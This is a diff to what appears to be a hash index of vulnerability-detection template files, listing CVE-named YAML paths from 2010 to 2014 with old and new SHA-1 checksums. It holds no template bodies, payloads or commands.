+http/cves/2010/CVE-2010-0982.yaml:1bdca21eb37ed8f0d23b846d35daeb482e53ebc5 +http/cves/2010/CVE-2010-0985.yaml:da588f31265aec884f99ea9bf4525e29b1d877de +http/cves/2010/CVE-2010-1056.yaml:834dbab2905b11960f20a0d673b6d6b5bfd4a13e +http/cves/2010/CVE-2010-1081.yaml:a4eef3207aa0ea0b07def05f593e8a0886895697 +http/cves/2010/CVE-2010-1217.yaml:4e92030ef5881cadf006789d98d3a2515600adc4 +http/cves/2010/CVE-2010-1219.yaml:086d0283ce2ebb608a15ec171f7bb719eeec7b5c +http/cves/2010/CVE-2010-1302.yaml:f8e03e122dcd66817e90d6c261d058596d70900f +http/cves/2010/CVE-2010-1304.yaml:22c5cd272d5f52fe4e464605c12f8af10ea753f2 +http/cves/2010/CVE-2010-1305.yaml:56208e07b8414fdd48cc0698e3872e300864541e +http/cves/2010/CVE-2010-1306.yaml:658971fe3b664ecb697f118e691d8a0d198511f4 +http/cves/2010/CVE-2010-1307.yaml:b070b4ad84780e1ee29b9ebaf80795099f706526 +http/cves/2010/CVE-2010-1308.yaml:2d0dd8a5233ac566fc64521921d520538bf68613 +http/cves/2010/CVE-2010-1312.yaml:864831e5a39953914d5cf1a9e0bd0cca729a3049 +http/cves/2010/CVE-2010-1313.yaml:7a017f0125451ee26a9a81ffcd8c2d32d5cb8cba +http/cves/2010/CVE-2010-1314.yaml:733050c619c0c9402fef0205729ef0fcf4842b7a +http/cves/2010/CVE-2010-1315.yaml:30908190d20ff6a259c4955466d9de0e7d5e91fd +http/cves/2010/CVE-2010-1340.yaml:3771b777262bdcf1be27e2f0e8ca091415e687df +http/cves/2010/CVE-2010-1345.yaml:f400c6fa1ada03729b73cdca427d12f604ac1dc5 +http/cves/2010/CVE-2010-1352.yaml:0f057884607878d8706b8a3d31f4371d78996258 +http/cves/2010/CVE-2010-1353.yaml:0268f708c35e75f6cb33028571466eadb895a741 +http/cves/2010/CVE-2010-1354.yaml:4f54c1e06b145b4958e6d800958a6c0db84e5847 +http/cves/2010/CVE-2010-1429.yaml:ab93cb51a77b31df266f42ba25b9853a1d0d3cb2 +http/cves/2010/CVE-2010-1461.yaml:60692ca33ec65c327a29028b369d34d161f32a0f +http/cves/2010/CVE-2010-1469.yaml:5334ff792ad2c97d7229f1d2041bc04ea33cc9bf +http/cves/2010/CVE-2010-1470.yaml:17eb183edbee591a8f82180b4bb44416d6c31b19 +http/cves/2010/CVE-2010-1471.yaml:e270d923c338eae2a667abc50facab6a4870da17 +http/cves/2010/CVE-2010-1472.yaml:61744e6eac7fd9fb2ca559e4188e7486fe70522e +http/cves/2010/CVE-2010-1473.yaml:f182722c832a36f389ab531842744495a2781426 +http/cves/2010/CVE-2010-1474.yaml:17f6d4e0deb3b083f6803bbfd13f6cf90fbcf8b5 +http/cves/2010/CVE-2010-1475.yaml:eaca90599ab1d89052b63919034ed1b33e10876e +http/cves/2010/CVE-2010-1476.yaml:cec0bb7cf9375ace62d48fb0be42361b7bc39a42 +http/cves/2010/CVE-2010-1478.yaml:059e56825b8c5b6a4932bf561f5f9da30ad976e3 +http/cves/2010/CVE-2010-1491.yaml:598551cb7c2437d005d75b7603b2a83800709dc6 +http/cves/2010/CVE-2010-1494.yaml:76552d434a6317beb49805fd6b10557402fa797c +http/cves/2010/CVE-2010-1495.yaml:3581785dc85fad80180de13e62c277fd04943c3a +http/cves/2010/CVE-2010-1531.yaml:8f7af45117168d2e445a23b658579bdb568118e3 +http/cves/2010/CVE-2010-1532.yaml:ff84e45b2a0dbb302add9f69c07a4793f08470a9 +http/cves/2010/CVE-2010-1533.yaml:01da207284ecfa30c7019d5e400e71b5799337f3 +http/cves/2010/CVE-2010-1534.yaml:2aed56750e3f0e28b2e2436015c1cd53f6373bd4 +http/cves/2010/CVE-2010-1535.yaml:0da8138254f89b73534c54fb3da2da47ed5c5fc2 +http/cves/2010/CVE-2010-1540.yaml:a2819e4c347b26e4fbfb82be7418d61571587105 http/cves/2010/CVE-2010-1586.yaml:2e596eff10133f0d84657fe1d69e9db0502c78a6 -http/cves/2010/CVE-2010-1601.yaml:2c91d92d72db66ff0263c52150c99e8cc72a2647 -http/cves/2010/CVE-2010-1602.yaml:6fb1277e3142751c15e5ac9cee940e30fe6138a1 -http/cves/2010/CVE-2010-1603.yaml:e9c5797723709a4a72081743f9746b24e856c003 -http/cves/2010/CVE-2010-1607.yaml:17f6d1c7c1b96e12a7ba8795b1eb757d31cbc0d9 -http/cves/2010/CVE-2010-1653.yaml:ba0c22dd541e481b0c497321278fac64ee769003 -http/cves/2010/CVE-2010-1657.yaml:d714e204b971260d4bc50eaef996225b14e465a1 -http/cves/2010/CVE-2010-1658.yaml:f79dad23715773e85be111cb04ed84163f32fa3a -http/cves/2010/CVE-2010-1659.yaml:2bafce172c3312caa1167898a3d5daddeb2f5fcb -http/cves/2010/CVE-2010-1714.yaml:211b0f46d1c10de46fe198b2dca2d1581cb0dc26 -http/cves/2010/CVE-2010-1715.yaml:f7d99b0982d00e0481b99f4d6a3f7c4e26a71c3f -http/cves/2010/CVE-2010-1717.yaml:49baac2735129376f85a9295b2fdbb2b4d256bdc -http/cves/2010/CVE-2010-1718.yaml:45c8471d74af80c11c6c6e0e24598d924cfd9c68 -http/cves/2010/CVE-2010-1719.yaml:85f36b952e93b4dee769d81869d05a93321bb864 -http/cves/2010/CVE-2010-1722.yaml:70ae20363403d4302db0f74f174ab2f681b2f2af -http/cves/2010/CVE-2010-1723.yaml:0f89ab030e1e708c94291fcadcfb287eff621d46 -http/cves/2010/CVE-2010-1858.yaml:8d14c09f68209a3956679fe48568c7123ed21e12 -http/cves/2010/CVE-2010-1870.yaml:7b493c73a611224c1c439bc807f6105292e0c84b -http/cves/2010/CVE-2010-1875.yaml:a4c88bec250af71b86a5b671fb12d08ab022d910 -http/cves/2010/CVE-2010-1878.yaml:3b575e7d90afaa3241af01ee3349446695264230 -http/cves/2010/CVE-2010-1952.yaml:0246d8b4e93b1044d4f6e3766136d2ada83809ba -http/cves/2010/CVE-2010-1953.yaml:b93802ab8f82dc2d8cc64e2068e41827c15d9df5 -http/cves/2010/CVE-2010-1954.yaml:0f71fd375df81d3688c8c7df1223dcedb5286ee6 -http/cves/2010/CVE-2010-1955.yaml:20e37ea40ab250144844e81b517dda295ed2561e -http/cves/2010/CVE-2010-1956.yaml:2e7fe809b4ba4b3084fe640e6fbafeec6b8cf008 -http/cves/2010/CVE-2010-1957.yaml:861be59feb1aa0457182f39946a3ea82845410d5 -http/cves/2010/CVE-2010-1977.yaml:36f29c8a8c874ea1a7762916d37482685fa07c9f -http/cves/2010/CVE-2010-1979.yaml:42ba549ab00ccce4ab52fc57c6a13cbc5400d585 -http/cves/2010/CVE-2010-1980.yaml:18b922bc16e6ebf8e7d2c2e0db167979df80879b -http/cves/2010/CVE-2010-1981.yaml:b6850bcb89f60eb1b5045f8bac58f83903b52e87 -http/cves/2010/CVE-2010-1982.yaml:7afadda2bc14f91b33eed798c804a45e0bab42f4 -http/cves/2010/CVE-2010-1983.yaml:de2b8ee85b499e0ebf8c44d0f89c13a4cb966492 -http/cves/2010/CVE-2010-2033.yaml:7728bdb659c0b80d223620a7b2dac77c49de1a34 -http/cves/2010/CVE-2010-2034.yaml:26b63782197d7641a6c5aa621a4600143f8add78 -http/cves/2010/CVE-2010-2035.yaml:ed8fe27a6f61002d2e783fe20714268332fc6bd2 -http/cves/2010/CVE-2010-2036.yaml:330b5960fee57987c29a709b8e1ec37f942aa7a9 -http/cves/2010/CVE-2010-2037.yaml:73b5546e71616ea87cf72f784a7a263cd46f240c -http/cves/2010/CVE-2010-2045.yaml:8c7e189fca19829c509f41fbfb085a58c0ff7cde -http/cves/2010/CVE-2010-2050.yaml:585f962f100c3da8c9bbb8a23ba5f081a1d9445b -http/cves/2010/CVE-2010-2122.yaml:9922a63563a24391f0e421fdb40df2e32f839989 -http/cves/2010/CVE-2010-2128.yaml:90b41d05b1a0686a355abd65f95156761e71784d -http/cves/2010/CVE-2010-2259.yaml:a1335959865e0c9085d4a126ca32a250a2e2ea55 -http/cves/2010/CVE-2010-2307.yaml:16a8ff3238fa6c2e4a9ec0732b08390d4033e2fb -http/cves/2010/CVE-2010-2507.yaml:ba3e064a35589ccd1bf0d1383d6b563385e7a7ad -http/cves/2010/CVE-2010-2680.yaml:2864cc18e352f7bdcb23749ec97cf575fd65b676 -http/cves/2010/CVE-2010-2682.yaml:c348ab03180c1ea6a0c3703511edb0c3d10d723a -http/cves/2010/CVE-2010-2857.yaml:34bfa7974199cc3c617e9501aff6a2627d8b7bb0 -http/cves/2010/CVE-2010-2861.yaml:a8938f06058182a241f5ab15d20ef8165ea44536 -http/cves/2010/CVE-2010-2918.yaml:c7fccef26a739a779d9383b0c1a6aed6cb6ca82d -http/cves/2010/CVE-2010-2920.yaml:3f142aad253f70770474b19c71eb25083ef89d69 -http/cves/2010/CVE-2010-3203.yaml:b2b6ba26ca7bc4d3054a39e355e83e047f298f50 -http/cves/2010/CVE-2010-3426.yaml:eedc0252794536c800c5d542d719926056bda22e -http/cves/2010/CVE-2010-4231.yaml:d283e9d04ccea93fa7dca1b12505b8f3681cade3 -http/cves/2010/CVE-2010-4239.yaml:19640812a527253b54bf54e8f80086a1f9968bd7 -http/cves/2010/CVE-2010-4282.yaml:3d4bf6e966ea7db4144301a445bd0337a8b3a954 -http/cves/2010/CVE-2010-4617.yaml:24d632cda526fc7d33ab3b99646a24a00c743705 -http/cves/2010/CVE-2010-4719.yaml:2f59a5e38104c8ca8b1e95c34e6ba6b6e72af4aa -http/cves/2010/CVE-2010-4769.yaml:d1a919bbdf74ce73f98ae8f5927dd8a6ff05afa2 -http/cves/2010/CVE-2010-4977.yaml:9b11dc55bbb05af62de49fa678b1017b2c197201 -http/cves/2010/CVE-2010-5028.yaml:bc452f041d3dc367c5c139a19163ce97c0439f2c -http/cves/2010/CVE-2010-5278.yaml:e748d28d97d3306b59fe92524156013222886dec -http/cves/2010/CVE-2010-5286.yaml:fc34d24b2b4e8247b0ae934cd3c3550e3e2d624f -http/cves/2011/CVE-2011-0049.yaml:4b57c86b01f67807e64cb1cc8be6827f560fd755 -http/cves/2011/CVE-2011-1669.yaml:0778911c039daa9d3e0a67a6fc7eba134e27a112 -http/cves/2011/CVE-2011-2744.yaml:37b048b323b921a918837b00bd3cf3984216d497 -http/cves/2011/CVE-2011-2780.yaml:09520db3d374c931c3e30b6504ef8e375988e2b3 -http/cves/2011/CVE-2011-3315.yaml:db2591a88e760836b6194cd040fc6953097dea25 -http/cves/2011/CVE-2011-4336.yaml:46d1dd176f0233f7c218851e189f58e44f34d172 -http/cves/2011/CVE-2011-4618.yaml:6c08ffeabc0c7f571d564772c099745bdadb0aa5 -http/cves/2011/CVE-2011-4624.yaml:d3899a18da5f9983e78441073625e965d6fca8ab -http/cves/2011/CVE-2011-4804.yaml:cb6e937c945d85da8a4a94afd2537b5cfe298360 -http/cves/2011/CVE-2011-4926.yaml:ebf95f8c00d96ee6fd58c52c3f6867ccec3cad25 -http/cves/2011/CVE-2011-5106.yaml:62df63db6c38bc69ee30e592ef896b832182291b -http/cves/2011/CVE-2011-5107.yaml:73533fe2bb67c9f5a82c8fe6ef5740613743bcd1 -http/cves/2011/CVE-2011-5179.yaml:41737868cece39bce96526f004ea79a2fdcf0947 -http/cves/2011/CVE-2011-5181.yaml:eac3c03adfe37a296a3230a96531e7c1c3d1d5bf +http/cves/2010/CVE-2010-1601.yaml:f4f6f2ee7af378ff6d96522a1c349fdd5062ec88 +http/cves/2010/CVE-2010-1602.yaml:ada8f8538f05db04dbfe3cf97c86839c6e642fac +http/cves/2010/CVE-2010-1603.yaml:e8a30cb0a669f2372faa9d7fcdf2412befc3a2a7 +http/cves/2010/CVE-2010-1607.yaml:eccbf44d51ed915d0fe6eb084cc6b9d18ef81b6b +http/cves/2010/CVE-2010-1653.yaml:21e7095ef74e17c82cfb2bca65567bd291ef8c97 +http/cves/2010/CVE-2010-1657.yaml:d76ba624a16e979210fa6fa5b7c4808e08a18b1d +http/cves/2010/CVE-2010-1658.yaml:f8eb84b1272a23829eb150467e3b6733c9ce0d24 +http/cves/2010/CVE-2010-1659.yaml:522b454eef481596b72279ed56b221330841dc6b +http/cves/2010/CVE-2010-1714.yaml:e8ef479ef0964623fcb01ce727d158e6ddf17e99 +http/cves/2010/CVE-2010-1715.yaml:32f78fff4a323145c12fbef712819b89a08ee484 +http/cves/2010/CVE-2010-1717.yaml:7de56dfd79c41c24e2126576e0fe346cbcb3b88e +http/cves/2010/CVE-2010-1718.yaml:5e3bc6126f4b9c8ee75fc3867bbbdb790c639634 +http/cves/2010/CVE-2010-1719.yaml:267f0ac07a23ef23e3ba77421285522780c57d1e +http/cves/2010/CVE-2010-1722.yaml:70852fb6bcd601c9c0d72c553ee0e7d8d7c82f71 +http/cves/2010/CVE-2010-1723.yaml:09c2871ea8a0d8e14ef88f5f35bb8f1604933290 +http/cves/2010/CVE-2010-1858.yaml:14bc8bed5db4c5d4311da535573bc906a912f22d +http/cves/2010/CVE-2010-1870.yaml:e49a2c155de6da4354370c3055aa6ec873dfe65b +http/cves/2010/CVE-2010-1875.yaml:1c66ad00513b470c55c5bf183d28f2a3166b5347 +http/cves/2010/CVE-2010-1878.yaml:e004ceccd7939aa49261c9049476452e3ef20c77 +http/cves/2010/CVE-2010-1952.yaml:1d4f7c618a916af803980f50757b55399eed902e +http/cves/2010/CVE-2010-1953.yaml:b3c76f9d7ec0e2f664e7e2e10ec64afc14eb4c65 +http/cves/2010/CVE-2010-1954.yaml:0d1dd98d658ad4e7a0660e104fbcc45d9e971134 +http/cves/2010/CVE-2010-1955.yaml:f109c2b46b90def16b5d73b9842cc5f30840dace +http/cves/2010/CVE-2010-1956.yaml:5bab2055b7a92f10ae5dbe065973817b3d68b7e2 +http/cves/2010/CVE-2010-1957.yaml:de8eeaaa4bf196c74abc0138420d3aec135ed171 +http/cves/2010/CVE-2010-1977.yaml:536075ba711298dbec828589fe0c47b1beb8d8cc +http/cves/2010/CVE-2010-1979.yaml:8b2eaeefb7083f711d80b2b3f2e2f3e5a2f5d8cf +http/cves/2010/CVE-2010-1980.yaml:084580c8017e587fac2459ab0dad6899900566c4 +http/cves/2010/CVE-2010-1981.yaml:2071431e9c388a0a917b3db2d84beefb6d9856a3 +http/cves/2010/CVE-2010-1982.yaml:438afd0f46665832fc158befadb44ed241fd3160 +http/cves/2010/CVE-2010-1983.yaml:b0a94280cdc73595356cf68a8d1a15827cc3b646 +http/cves/2010/CVE-2010-2033.yaml:2ed48ce9710b50b4db51b978d32414258f6314f7 +http/cves/2010/CVE-2010-2034.yaml:48e697f2c0d5717f2d6311ea56466589f99c0d1b +http/cves/2010/CVE-2010-2035.yaml:ad5db05c732e952e3f6a0927cadb1b1cf37e98b1 +http/cves/2010/CVE-2010-2036.yaml:126e43d17c3bc498afa5239de742f37491c298c3 +http/cves/2010/CVE-2010-2037.yaml:7aa7d721f38b41f2d44c50c75ca8c5a90eacaed9 +http/cves/2010/CVE-2010-2045.yaml:2d91b3962464493d903781028196f6aa6a998d78 +http/cves/2010/CVE-2010-2050.yaml:8888d13b5acad4a80c9fad7a026f8fc6a8e111ff +http/cves/2010/CVE-2010-2122.yaml:e9f7d727c3612b5a19d7aca15bfd4e02f3943e2d +http/cves/2010/CVE-2010-2128.yaml:8209cae104b4315b2dc97c61618b24594c044ed4 +http/cves/2010/CVE-2010-2259.yaml:89336c515fe79723edd8ec7a21053502b393408a +http/cves/2010/CVE-2010-2307.yaml:6dfbe5b0797af8c181488727a2bf36bc34620651 +http/cves/2010/CVE-2010-2507.yaml:914afd4aaaf32cdbcc0da37c2d38079e54cc961c +http/cves/2010/CVE-2010-2680.yaml:9db6b99b441afec812d50dff45fffec882b74dc0 +http/cves/2010/CVE-2010-2682.yaml:afd575bdc808962aec113ae75c91370278910a3f +http/cves/2010/CVE-2010-2857.yaml:df493d90b2535ffb376a2fdd4b29ce3ed46f6dad +http/cves/2010/CVE-2010-2861.yaml:88109d52735a552d38a1b05f13652a6f7df3ceeb +http/cves/2010/CVE-2010-2918.yaml:f3c7a636285daae6e9f272cf4edeea824f01a23e +http/cves/2010/CVE-2010-2920.yaml:6795cdcb13aa42f46ecde0dd4ea30b759b7d2e20 +http/cves/2010/CVE-2010-3203.yaml:c0e305ba61c503e05084ddaa0a4f86df68672024 +http/cves/2010/CVE-2010-3426.yaml:848290297a8ac30d25e3539288365b46d7f4c303 +http/cves/2010/CVE-2010-4231.yaml:96697426ecdac157cf112488c39c81104adf2014 +http/cves/2010/CVE-2010-4239.yaml:6b93dacf365365652bbe0bc6ee6388a6be02f250 +http/cves/2010/CVE-2010-4282.yaml:dfaf2702e9fd7dcafbd3f5d43c757c2a5a0b1c6c +http/cves/2010/CVE-2010-4617.yaml:b43605eeba96e66fa65c323b691dcd7367ff672a +http/cves/2010/CVE-2010-4719.yaml:03934ff4006cde67308db9e4547e23c1e84ca18f +http/cves/2010/CVE-2010-4769.yaml:c2bf6d4bd9d1ef9dc76544945215ef1b615c6857 +http/cves/2010/CVE-2010-4977.yaml:594e5bcf90751c43c3bae588eb20285f40235ecd +http/cves/2010/CVE-2010-5028.yaml:d5ca75c22f81ed0630e077111fd0dce4745dfe77 +http/cves/2010/CVE-2010-5278.yaml:b47ff2b6b47e240872bf3b26db6799b84cc4a1e9 +http/cves/2010/CVE-2010-5286.yaml:426de706e989199fe28c54ce30df2187ef5b455b +http/cves/2011/CVE-2011-0049.yaml:015dd51f6fdab7aef271bf610ff2367bdb2a7780 +http/cves/2011/CVE-2011-1669.yaml:18bd83f11cf1ef2af2e19c7714eb8b4969862381 +http/cves/2011/CVE-2011-2744.yaml:93549e1b16365d247b90db8ee568dacb0be928ab +http/cves/2011/CVE-2011-2780.yaml:807b0b3f1e61f4eb6ad2503da44a4e46d73b5466 +http/cves/2011/CVE-2011-3315.yaml:cc55691f7b94fc25953338fd2def700731258070 +http/cves/2011/CVE-2011-4336.yaml:0bbb92f9603bff9aa326caf7862b719c5d4a7e21 +http/cves/2011/CVE-2011-4618.yaml:dc9824427fecfd5ee9e2d28f5bddf2e38854ef11 +http/cves/2011/CVE-2011-4624.yaml:4b1fe8857c86bff5421456864d67a457201b5b4e +http/cves/2011/CVE-2011-4804.yaml:2a51fbc0f67517380376d9952bed9fcfd381e731 +http/cves/2011/CVE-2011-4926.yaml:984ea5817a9d5c1225051bf16027ce651c62c101 +http/cves/2011/CVE-2011-5106.yaml:9b751af745fa998f723e532c7cfc18b4a2e74e14 +http/cves/2011/CVE-2011-5107.yaml:5920ded6a329e4abd872bdc720abaa7ff0b32ac3 +http/cves/2011/CVE-2011-5179.yaml:6d37363ac72411b582b62b1f9233fbaf0ae4a5cb +http/cves/2011/CVE-2011-5181.yaml:de73d6070a275f8eadfec0706a19f8fe02dcd7ed http/cves/2011/CVE-2011-5252.yaml:4bc077a3a0aba9194d862504bd05754801042ae2 -http/cves/2011/CVE-2011-5265.yaml:2beebb43998120b5b88b759ac765f58db16723af -http/cves/2012/CVE-2012-0392.yaml:5e0febd8bd2ca4fdea24bc503e976e0c3c4c24ea -http/cves/2012/CVE-2012-0394.yaml:55e9773e0fa82aa6b65ccb9c27d8b4c81c80be25 -http/cves/2012/CVE-2012-0896.yaml:2e9d00e27db531a60ca9aa5241c9140e57021eee -http/cves/2012/CVE-2012-0901.yaml:e41c1bb136bc284959b0ec26833a3bbad5435d9c -http/cves/2012/CVE-2012-0981.yaml:f7dda71224a8b2b69f20cb4a88eb8ea2e35a0a53 -http/cves/2012/CVE-2012-0991.yaml:e5e1658570de4a279923edfc204d31115f87012c -http/cves/2012/CVE-2012-0996.yaml:778e58803bba95c3fdb02650fc228cc42b28b561 -http/cves/2012/CVE-2012-1226.yaml:da32f78faa398aad8e1308ffe9993a7588e2a383 +http/cves/2011/CVE-2011-5265.yaml:f0977991e550fa0f2890a0a8296a5982e29a436d +http/cves/2012/CVE-2012-0392.yaml:42e0026bb77a7defc07f1c67e1ff9c5d694488c7 +http/cves/2012/CVE-2012-0394.yaml:948286eae33486af6f5929d3db5328d6f14b4b57 +http/cves/2012/CVE-2012-0896.yaml:5ff5e5f12d6f64899098c6eb23665bc4f976c86d +http/cves/2012/CVE-2012-0901.yaml:f84a5ea70326e698dbb1eb57d2122f32d2fc4f85 +http/cves/2012/CVE-2012-0981.yaml:66066f4b9f76cfa1fa9f5e588fb6bf9a4b43f8e7 +http/cves/2012/CVE-2012-0991.yaml:7da37c0ca86f16878543cec4a26b32123fb5eaac +http/cves/2012/CVE-2012-0996.yaml:a1a4bbbcfb033a915d7a3e59215263c8488460a8 +http/cves/2012/CVE-2012-1226.yaml:610ab3942856ac86a4239838329f84c3bb65604e http/cves/2012/CVE-2012-1823.yaml:9ae8ab2f3370935efc1abfe02c0b2b322eb51ae7 -http/cves/2012/CVE-2012-1835.yaml:34dc1f0bc3f481b4c8d4088b4d59d2616bfb9291 -http/cves/2012/CVE-2012-2371.yaml:ebfd4520c731e54356a74a00b88941554badb0ca -http/cves/2012/CVE-2012-3153.yaml:ebf48c069f89faee767673e6705715be60afcc3a -http/cves/2012/CVE-2012-4242.yaml:612057e4321d9525df4d18f68de4fcb9a1d6d91d -http/cves/2012/CVE-2012-4253.yaml:ccaeb356349f58e46e5727aa05c4e85bb5b82415 -http/cves/2012/CVE-2012-4273.yaml:be2d96cf2667768b33e777eff54065b3820b67cc -http/cves/2012/CVE-2012-4547.yaml:b5e04f27d72b6ac333e1785ed3f33a79886ea50b -http/cves/2012/CVE-2012-4768.yaml:eede45d899f4df7a6c4ea37af40214edfcbf3635 -http/cves/2012/CVE-2012-4878.yaml:8b835957f681819c6a98ee5d0c8dfab241f0d215 -http/cves/2012/CVE-2012-4889.yaml:b94729905c1eb7527864aac08d9fe12ec43dac86 -http/cves/2012/CVE-2012-4940.yaml:ad96fe92c5108ab23e46211fe893ac7df8baa78e +http/cves/2012/CVE-2012-1835.yaml:dc4480892a605a8a27707bb184e9c5cbb394bbdc +http/cves/2012/CVE-2012-2371.yaml:c8bca00fce32b6e7f50c2722167caa4bf20520b8 +http/cves/2012/CVE-2012-3153.yaml:abcf9b5f9f05a1f7ee854080a37cf372e82920bc +http/cves/2012/CVE-2012-4242.yaml:6b5c0f81293b8da16c4a0c143475efd479b2761e +http/cves/2012/CVE-2012-4253.yaml:ba8b115c88ce26ff0bb5997fc4de3df7a8a9d53a +http/cves/2012/CVE-2012-4273.yaml:b9ba87caa0c13df195b8dd55d3e67bfdd2ada704 +http/cves/2012/CVE-2012-4547.yaml:3e2401e27ce89621ba9e56c4da9277913149c5c2 +http/cves/2012/CVE-2012-4768.yaml:5d8182587a7d665db63e47fc4bd063253edf61a5 +http/cves/2012/CVE-2012-4878.yaml:25341ae63d2c4af4ab30c4d77777e0dcee40989d +http/cves/2012/CVE-2012-4889.yaml:af80a0e846d7dd2a02625edd5603b800af9cbd17 +http/cves/2012/CVE-2012-4940.yaml:a81029ca9de0ba666175e7417ccfffb1c0c9f35e http/cves/2012/CVE-2012-4982.yaml:edd0146a6beac65161aa4074a99ba6c4e4d325cc http/cves/2012/CVE-2012-5321.yaml:03993d3f701d3b331994520dee9cda9bac556815 -http/cves/2012/CVE-2012-5913.yaml:b0ddd82e2ce5a8628df761041d1b4280aeecd00b +http/cves/2012/CVE-2012-5913.yaml:59b2e0a3176e1c04f3838e5c2eecdaa70c142933 http/cves/2012/CVE-2012-6499.yaml:522ad7554dd76fbb2e125c7da7aef0e42b6e129d -http/cves/2013/CVE-2013-1965.yaml:babc668e22e6d8704ce7cf798fb454f22d32c604 -http/cves/2013/CVE-2013-2248.yaml:7d0503d1be8337527e505bf906f8caec7de56a4e -http/cves/2013/CVE-2013-2251.yaml:27cf22446500d19319624be2af88407bfa933aa6 -http/cves/2013/CVE-2013-2287.yaml:e109ecf43312434cc4d37d6749ba838f0f9b8843 +http/cves/2013/CVE-2013-1965.yaml:5afac7c28124ae2b5382a91be44616020eb48d6e +http/cves/2013/CVE-2013-2248.yaml:5785f2e6800dd59445915b474efa8f1b000bf493 +http/cves/2013/CVE-2013-2251.yaml:33567293156da6a0f6cda7cda916b3f4dac2928a +http/cves/2013/CVE-2013-2287.yaml:23c17448313b78417b7fad1635046eb4ffc3d812 http/cves/2013/CVE-2013-2621.yaml:0b9120ad044fbfdd046cd3319fa714c202bf4094 -http/cves/2013/CVE-2013-3526.yaml:721d716989b08654ce88cf0f99c395bfc5488090 -http/cves/2013/CVE-2013-3827.yaml:9febc5d0a547c2897d6836fbe753a49f7bcc4fe0 -http/cves/2013/CVE-2013-4117.yaml:eb639422cbffb1d20cd8198369444f96ea430c92 -http/cves/2013/CVE-2013-4625.yaml:3c0648bacdd03cf0ae6edd3bc216b52f25c2f3d8 -http/cves/2013/CVE-2013-5528.yaml:d9c8819070dc7e03b8423d3dc825e8ae903137d1 -http/cves/2013/CVE-2013-5979.yaml:51e7b8edac8792d2b53ec8ff2a77da0141056f48 -http/cves/2013/CVE-2013-6281.yaml:ced1ba91bcd4fb3f990d1eb68249a596e2b9126c -http/cves/2013/CVE-2013-7091.yaml:55341b568250b4ccafbe6a75fd18f428d7fd767d -http/cves/2013/CVE-2013-7240.yaml:5d70e14e5e86f3ef984d0df87cb265f24ad1213a -http/cves/2013/CVE-2013-7285.yaml:846bc6cb18a2908724298dcc17df8e52449dc001 -http/cves/2014/CVE-2014-10037.yaml:d4ec17200e05d886d2427d789cd500c9a6aa3425 -http/cves/2014/CVE-2014-1203.yaml:d797f9e64a9d2422e78fa43e31ac053c4fbe84e9 -http/cves/2014/CVE-2014-2321.yaml:4a112b63fe91fa96ecaa65f2f444bf2814e926a5 -http/cves/2014/CVE-2014-2323.yaml:c1ad92dece25fee60d1d837b61a49afeed99813f -http/cves/2014/CVE-2014-2383.yaml:86740d5e93e0406cd6d47723e903e370972ffba8 -http/cves/2014/CVE-2014-2908.yaml:597eff7421cb0b9e20560ce1f71c81644ac9c195 -http/cves/2014/CVE-2014-2962.yaml:78e51ce56a0ac86968edce321f111b0162052854 -http/cves/2014/CVE-2014-3120.yaml:3fe8aa4908b5c1304b089758c57edbf069e118b8 -http/cves/2014/CVE-2014-3206.yaml:728998a21c923a1c1aeb77aba7a57b2969ff255d -http/cves/2014/CVE-2014-3704.yaml:23bfd45055c57fd82b1db18026e95c649550430d -http/cves/2014/CVE-2014-3744.yaml:299b379be6c88144ff4f0c5b721bb749d984ed73 -http/cves/2014/CVE-2014-4210.yaml:a86ecb3dd9cfea1d36af544bf7a3609a7c101107 -http/cves/2014/CVE-2014-4513.yaml:0dfb692d60d068a144efeadce7327cdcd8ba5ef0 -http/cves/2014/CVE-2014-4535.yaml:4d08706c7661c25dd7f90c593d01ce65c412737e -http/cves/2014/CVE-2014-4536.yaml:b738b50d269bb6060c48ec69c8c65f6c38566ae0 -http/cves/2014/CVE-2014-4539.yaml:67fbdea95bd96b26d9244d23c2029ca11d671922 -http/cves/2014/CVE-2014-4544.yaml:d9aa0eaa79d93ade5f1e013160e6c40ae113dbb0 -http/cves/2014/CVE-2014-4550.yaml:b6e7e7ec8229e31d870803c3a6db6843bde4cd03 -http/cves/2014/CVE-2014-4558.yaml:988368e7ef0097e30f6ed643659b1630d0f06bcc -http/cves/2014/CVE-2014-4561.yaml:5e3042a85f6a66c8ee994e994646e6ce252fe6f1 -http/cves/2014/CVE-2014-4592.yaml:051158a5cec94df38d545549734045a788fccede -http/cves/2014/CVE-2014-4940.yaml:b7edce6fae49336f42ce5938a7037a7501bc4420 -http/cves/2014/CVE-2014-4942.yaml:2b101ab7a2d1b2cbb1df3c97e58e41152e79d007 -http/cves/2014/CVE-2014-5111.yaml:6757172e40eb4eaf6d9f19f1b5550d934549e832 -http/cves/2014/CVE-2014-5258.yaml:c5194ef347733c6fe05d69e6c371ca1dcb996cea -http/cves/2014/CVE-2014-5368.yaml:618741cc501e219392d4da5437c1c23104ae0938 -http/cves/2014/CVE-2014-6271.yaml:d4e288900662cb4e924c03a6d7fb2cbbcdb37a59 -http/cves/2014/CVE-2014-6287.yaml:613d456b9d61b02a418e209726795f236847110e -http/cves/2014/CVE-2014-6308.yaml:aa2b869cf95cab640ba6aaea3f9abbb019e5fd4c -http/cves/2014/CVE-2014-8676.yaml:abaca5b7ee9dc704d2e931afa2ea6e113110fa37 -http/cves/2014/CVE-2014-8682.yaml:7fc37672f2a5960b7e846f2f3a912baa6c74699d -http/cves/2014/CVE-2014-8799.yaml:87cafb31d0bbfa09aa09281733a3bea5fd625c09 -http/cves/2014/CVE-2014-9094.yaml:6b6249f5f583757ab5cb0e80b5fd12a09465c50b -http/cves/2014/CVE-2014-9119.yaml:4a153340842f24e78fd53ee2102584c2ee2fc964 -http/cves/2014/CVE-2014-9444.yaml:3403ddfe27f380b9dee5809338df4306a8c85df5 -http/cves/2014/CVE-2014-9606.yaml:f990e3b7721b4cfbe7db5c7f0f82945ad37e20be -http/cves/2014/CVE-2014-9607.yaml:ed9998b4bc92b010ec1272c23cba52a26012db44 -http/cves/2014/CVE-2014-9608.yaml:5965c38895a2edc8f092cc662ecf4ed5b701a32a -http/cves/2014/CVE-2014-9609.yaml:431fcfd082169601c1937480c26ea24b5b7845ff -http/cves/2014/CVE-2014-9614.yaml:4195a04b3163c862a728ebe82ef1699e1f2a8a9d -http/cves/2014/CVE-2014-9615.yaml:66aed90eb615a0ee179bec77b1afcf2175cb7996 -http/cves/2014/CVE-2014-9617.yaml:ee8d7d1ad18350c12b3c4b978b9c5a54ef8afce6 -http/cves/2014/CVE-2014-9618.yaml:056a64ebc3dcbf4be7429daf3084c3938b816831 